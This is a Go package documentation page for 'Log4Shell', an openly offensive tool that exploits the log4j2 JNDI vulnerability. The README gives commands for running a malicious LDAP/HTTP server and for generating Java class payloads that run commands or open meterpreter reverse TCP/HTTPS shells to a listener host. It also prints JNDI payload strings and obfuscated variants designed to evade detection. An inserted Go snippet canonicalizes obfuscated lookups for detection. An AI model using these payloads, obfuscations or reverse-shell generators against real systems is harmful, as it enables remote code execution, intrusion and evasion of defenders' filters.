log4shell

package module
v1.0.4
Published: Dec 23, 2021 License: GPL-3.0 Imports: 19 Imported by: 0

README

Log4Shell

Check, exploit, generate classes, obfuscate, TLS and ACME for the log4j2 vulnerability in one Go program.

Feature

  • Only one program and easy deployment
  • Supports common operating systems
  • Supports multiple Java class files
  • Supports LDAPS and HTTPS servers
  • Supports ACME for signing certificates
  • Generates classes without a Java compiler
  • Supports obfuscating the malicious (payload) string
  • Hides the malicious (payload) string
  • Adds a secret to protect the HTTP server
  • Adds a token to prevent repeated payload execution

Usage

Start Log4Shell server
  • Log4Shell.exe -host "1.1.1.1"
  • Log4Shell.exe -host "example.com"
Start Log4Shell server with TLS
  • Log4Shell.exe -host "example.com" -tls-server -tls-cert "cert.pem" -tls-key "key.pem"
  • Log4Shell.exe -host "1.1.1.1" -tls-server -tls-cert "cert.pem" -tls-key "key.pem" (the certificate needs IP SANs)
Start Log4Shell server with ACME
  • Log4Shell.exe -host "example.com" -auto-cert (must use a domain name)
Generate Java class file
Execute (no output):
  Log4Shell.exe -gen "execute" -args "-cmd calc" -class "Test"

System (with output):
  Log4Shell.exe -gen "system" -args "-bin cmd -args \"/c net user\"" -class "Test"

ReverseTCP (java/meterpreter/reverse_tcp):      // template will be open-sourced after some time
  Log4Shell.exe -gen "reverse_tcp" -args "-lhost 1.1.1.1 -lport 9979" -class "Test"

ReverseHTTPS (java/meterpreter/reverse_https):  // template will be open-sourced after some time
  Log4Shell.exe -gen "reverse_https" -args "-lhost 1.1.1.1 -lport 8443 -luri test" -class "Test"

The generated class file will be saved to the payload directory (the -output flag changes the path).
Obfuscate malicious (payload) string
Log4Shell.exe -obf "${jndi:ldap://1.1.1.1:3890/Calc}"
raw: ${jndi:ldap://1.1.1.1:3890/Calc$cz3z]Y_pWxAoLPWh}

${zrch-Q(NGyN-yLkV:-}${j${sm:Eq9QDZ8-xEv54:-ndi}${GLX-MZK13n78y:GW2pQ:-:l}${ckX:2@BH[)]Tmw:a(:-
da}${W(d:KSR)ky3:bv78UX2R-5MV:-p:/}/1.${)U:W9y=N:-}${i9yX1[:Z[Ve2=IkT=Z-96:-1.1}${[W*W:w@q.tjyo
@-vL7thi26dIeB-HxjP:-.1}:38${Mh:n341x.Xl2L-8rHEeTW*=-lTNkvo:-90/}${sx3-9GTRv:-Cal}c$c${HR-ewA.m
Q:g6@jJ:-z}3z${uY)u:7S2)P4ihH:M_S8fanL@AeX-PrW:-]}${S5D4[:qXhUBruo-QMr$1Bd-.=BmV:-}${_wjS:BIY0s
:-Y_}p${SBKv-d9$5:-}Wx${Im:ajtV:-}AoL${=6wx-_HRvJK:-P}W${cR.1-lt3$R6R]x7-LomGH90)gAZ:NmYJx:-}h}

Each obfuscated string can only be used once; to reuse it, wait 20 seconds (TokenExpireTime).
When the malicious (payload) string is obfuscated, the log4j2 package executes it repeatedly; the number of
repetitions equals the number of occurrences of the string "${". The LDAP server adds a simple
token mechanism to prevent this.
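A defender-side counterpart to the obfuscation described above, added here and not part of the Log4Shell project: a Go canonicalizer that resolves the ${key:-default} lookups a log pipeline or WAF rule would otherwise miss, then reports whether the result is a JNDI lookup and how many "${" the raw input held. It handles only the ":-" default form shown on this page (not the "$$" escape used by -hide); the sample input and its expected raw form are taken from the README above.

```go
package main

import (
	"fmt"
	"strings"
)

// Sample is the obfuscated string from the README above (wrapped lines joined);
// its raw form is ${jndi:ldap://1.1.1.1:3890/Calc$cz3z]Y_pWxAoLPWh}.
const Sample = `${zrch-Q(NGyN-yLkV:-}${j${sm:Eq9QDZ8-xEv54:-ndi}${GLX-MZK13n78y:GW2pQ:-:l}${ckX:2@BH[)]Tmw:a(:-` +
	`da}${W(d:KSR)ky3:bv78UX2R-5MV:-p:/}/1.${)U:W9y=N:-}${i9yX1[:Z[Ve2=IkT=Z-96:-1.1}${[W*W:w@q.tjyo` +
	`@-vL7thi26dIeB-HxjP:-.1}:38${Mh:n341x.Xl2L-8rHEeTW*=-lTNkvo:-90/}${sx3-9GTRv:-Cal}c$c${HR-ewA.m` +
	`Q:g6@jJ:-z}3z${uY)u:7S2)P4ihH:M_S8fanL@AeX-PrW:-]}${S5D4[:qXhUBruo-QMr$1Bd-.=BmV:-}${_wjS:BIY0s` +
	`:-Y_}p${SBKv-d9$5:-}Wx${Im:ajtV:-}AoL${=6wx-_HRvJK:-P}W${cR.1-lt3$R6R]x7-LomGH90)gAZ:NmYJx:-}h}`

// Canonicalize resolves every ${unknownKey:-default} lookup to its default, innermost
// first, as Log4j does for an undefined key. Lookups without ":-" (e.g. ${jndi:...}) stay.
func Canonicalize(s string) string {
	for {
		changed := false
		for i := strings.LastIndex(s, "${"); i >= 0; i = strings.LastIndex(s[:i], "${") {
			end := strings.Index(s[i:], "}") // first "}" after this "${" closes the innermost lookup
			if end < 0 {
				break
			}
			inner := s[i+2 : i+end]
			if sep := strings.Index(inner, ":-"); sep >= 0 {
				s = s[:i] + inner[sep+2:] + s[i+end+1:]
				changed = true
				break // string changed, rescan from the end
			}
		}
		if !changed {
			return s
		}
	}
}

// Inspect returns whether the canonical form is a JNDI lookup, the "${" count of the
// raw input (one re-execution per occurrence, per the README) and the canonical string.
func Inspect(s string) (jndi bool, lookups int, canonical string) {
	canonical = Canonicalize(s)
	jndi = strings.Contains(strings.ToLower(canonical), "${jndi:")
	lookups = strings.Count(s, "${")
	return jndi, lookups, canonical
}

func main() {
	jndi, n, canon := Inspect(Sample)
	fmt.Printf("jndi=%v lookups=%d canonical=%s\n", jndi, n, canon)
}
```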
Hide malicious (payload) string
Log4Shell.exe -obf "${jndi:ldap://127.0.0.1:3890/Calc}" -hide
raw: ${jndi:ldap://127.0.0.1:3890/Calc$YG=.z[.od7rH0XpE}
Execute VulApp:

E:\OneDrive\Projects\Golang\GitHub\Log4Shell\vulapp\jar>D:\Java\jdk1.8.0_121\bin\java -jar 
vulapp.jar ${j${0395i1-WV[nM-Pv:-nd}i${KoxnAt-KVA6T4:Xggnr:-}:${vlt0_:xTI:-}${kMe=A:QD3FK:
-l}d${SaS-TmMt:-a}${uQH-oRFIXtw-4[:-}p:${XL9-bkp9k]-xz:-//}12${D@-rF@wGm:-7.0}.${Fuc:SCV6B
m:-}${W1eelS:1jnUDknTJS:*7aHahf2m:vK:-0.1}${ft:4Zbf5Hf1G:Tskg:-:3}${6WH[wc:Fencc:-8}${24Y:
5h=5SqK-p(X9:-9}${oYCk6-RDIN5a$Od:U]3iOEVv:7MiEj:-0/C}${NzvB:]6T9$_O9-F.IUl-NnZq:-a}lc$YG=
${*E-5M:-.z[}${N_9@-6(l0sy-b(6.6t-y7NC*:-}${0i-4eS4kB:-.}${5WnL-LKTO554q-x[d:-od7}rH0$${oC
:.XYPyzv6-sPH.]*Ls:$@Q:-XpE}}
${j${0395i1-WV[nM-Pv:-nd}i${KoxnAt-KVA6T4:Xggnr:-}:${vlt0_:xTI:-}${kMe=A:QD3FK:-l}d${SaS-T
mMt:-a}${uQH-oRFIXtw-4[:-}p:${XL9-bkp9k]-xz:-//}12${D@-rF@wGm:-7.0}.${Fuc:SCV6Bm:-}${W1eel
S:1jnUDknTJS:*7aHahf2m:vK:-0.1}${ft:4Zbf5Hf1G:Tskg:-:3}${6WH[wc:Fencc:-8}${24Y:5h=5SqK-p(X
9:-9}${oYCk6-RDIN5a$Od:U]3iOEVv:7MiEj:-0/C}${NzvB:]6T9$_O9-F.IUl-NnZq:-a}lc$YG=${*E-5M:-.z
[}${N_9@-6(l0sy-b(6.6t-y7NC*:-}${0i-4eS4kB:-.}${5WnL-LKTO554q-x[d:-od7}rH0$${oC:.XYPyzv6-s
PH.]*Ls:$@Q:-XpE}}
15:49:14.676 [main] ERROR log4j - XpE}

E:\OneDrive\Projects\Golang\GitHub\Log4Shell\vulapp\jar>
The logger only records a part of the raw string, "15:49:14.676 [main] ERROR log4j - XpE}",
and the repeated execution does not appear (I don't know why this happens).

Check

  • start the Log4Shell server
  • send ${jndi:ldap://1.1.1.1:3890/Nop}
  • send ${jndi:ldaps://example.com:3890/Nop} when TLS is enabled

Exploit

  • start the Log4Shell server
  • put your class file into the payload directory
  • send ${jndi:ldap://1.1.1.1:3890/Meterpreter}
  • send ${jndi:ldaps://example.com:3890/Meterpreter} when TLS is enabled
  • the meterpreter template will be open-sourced after some time

VulApp

  • VulApp is a vulnerable Java program that uses the log4j2 package.
  • You can use it to develop this project easily.
  • java -jar vulapp.jar ${jndi:ldap://127.0.0.1:3890/Calc}

Help

:::      ::::::::   ::::::::      :::     ::::::::  :::    ::: :::::::::: :::      :::
:+:     :+:    :+: :+:    :+:    :+:     :+:    :+: :+:    :+: :+:        :+:      :+:
+:+     +:+    +:+ +:+          +:+ +:+  +:+        +:+    +:+ +:+        +:+      +:+
+#+     +#+    +:+ :#:         +#+  +:+  +#++:++#++ +#++:++#++ +#++:++#   +#+      +#+
+#+     +#+    +#+ +#+   +#+# +#+#+#+#+#+       +#+ +#+    +#+ +#+        +#+      +#+
#+#     #+#    #+# #+#    #+#       #+#  #+#    #+# #+#    #+# #+#        #+#      #+#
######## ########   ########        ###   ########  ###    ### ########## ######## ########

                                                      https://github.com/For-ACGN/Log4Shell

Usage of Log4Shell.exe:
-args string
      arguments about generate Java class file
-auto-cert
      use ACME client to sign certificate automatically
-class string
      specify the new class name
-gen string
      generate Java class file with template name
-hide
      hide obfuscated malicious(payload) string in log4j2
-host string
      server IP address or domain name (default "127.0.0.1")
-http-addr string
      http server address (default ":8080")
-http-net string
      http server network (default "tcp")
-ldap-addr string
      ldap server address (default ":3890")
-ldap-net string
      ldap server network (default "tcp")
-no-token
      not add random token when use obfuscate
-obf string
      obfuscate malicious(payload) string
-output string
      generated Java class file output path
-payload string
      payload(java class) directory (default "payload")
-tls-cert string
      tls certificate file path (default "cert.pem")
-tls-key string
      tls private key file path (default "key.pem")
-tls-server
      enable ldaps and https server

Screenshot

Documentation


Constants

const TokenExpireTime = 20 // second

TokenExpireTime is used to prevent repeated payload execution.

Variables

This section is empty.

Functions

func CommandLineToArgs added in v1.0.4

func CommandLineToArgs(cmd string) []string

CommandLineToArgs splits a command line into individual argument strings, following the Windows conventions documented at http://daviddeley.com/autohotkey/parameters/parameters.htm#WINARGV

func GenerateExecute added in v1.0.4

func GenerateExecute(template []byte, command, class string) ([]byte, error)

GenerateExecute is used to generate a class file that executes a command.

func GenerateReverseHTTPS added in v1.0.4

func GenerateReverseHTTPS(template []byte, host string, port uint16, uri, ua, token, class string) ([]byte, error)

GenerateReverseHTTPS is used to generate a class file for the meterpreter payload java/meterpreter/reverse_https.

func GenerateReverseTCP added in v1.0.4

func GenerateReverseTCP(template []byte, host string, port uint16, token, class string) ([]byte, error)

GenerateReverseTCP is used to generate a class file for the meterpreter payload java/meterpreter/reverse_tcp.

func GenerateSystem added in v1.0.4

func GenerateSystem(template []byte, binary, arguments, class string) ([]byte, error)

GenerateSystem is used to generate a class file that executes a command with arguments.

func Obfuscate

func Obfuscate(raw string, token bool) (string, string)

Obfuscate is used to obfuscate a malicious (payload) string like ${jndi:ldap://127.0.0.1:3890/Calc} for the log4j2 package. The return values are the obfuscated string and the raw string with the token.

func ObfuscateWithDollar added in v1.0.3

func ObfuscateWithDollar(raw string, token bool) (string, string)

ObfuscateWithDollar obfuscates the malicious (payload) string and adds a dollar symbol before one string like "${xxx-xxx:-section}". When one dollar is added, the repeated execution does not appear and the logger does not print the whole obfuscated string, just a little, but I don't know why this happens. It may cause unexpected situations, so it is disabled by default.

Types

type Config

type Config struct {
	// Logger is used to set server logger writer.
	Logger io.Writer

	// Hostname can be an IP address or a domain name.
	// If AutoCert is enabled, it must be a domain name.
	Hostname string

	// PayloadDir contains Java class files.
	PayloadDir string

	// Network and address of the servers.
	HTTPNetwork string
	HTTPAddress string
	LDAPNetwork string
	LDAPAddress string

	// AutoCert uses an ACME client to sign the
	// certificate automatically; EnableTLS does
	// not need to be set as well.
	AutoCert bool

	// EnableTLS enables the ldaps and https
	// servers; TLSCert must be set.
	EnableTLS bool

	// TLSCert is used for ldaps and https.
	TLSCert tls.Certificate
}

Config contains the configuration of the log4shell server.

type Server

type Server struct {
	// contains filtered or unexported fields
}

Server is used to create an exploit server that contains an http server and an ldap server (both can be wrapped in TLS); it is used to check and exploit the Apache Log4j2 vulnerability easily.

func New

func New(cfg *Config) (*Server, error)

New is used to create a new log4shell server.

func (*Server) HTTPAddress added in v1.0.2

func (srv *Server) HTTPAddress() string

HTTPAddress is used to get the http listener address.

func (*Server) IsEnableTLS added in v1.0.2

func (srv *Server) IsEnableTLS() bool

IsEnableTLS reports whether the log4shell server has TLS enabled.

func (*Server) LDAPAddress added in v1.0.2

func (srv *Server) LDAPAddress() string

LDAPAddress is used to get the ldap listener address.

func (*Server) Secret

func (srv *Server) Secret() string

Secret is used to get the generated secret used in the URL.

func (*Server) Start

func (srv *Server) Start() error

Start is used to start the log4shell server.

func (*Server) Stop

func (srv *Server) Stop() error

Stop is used to stop the log4shell server.
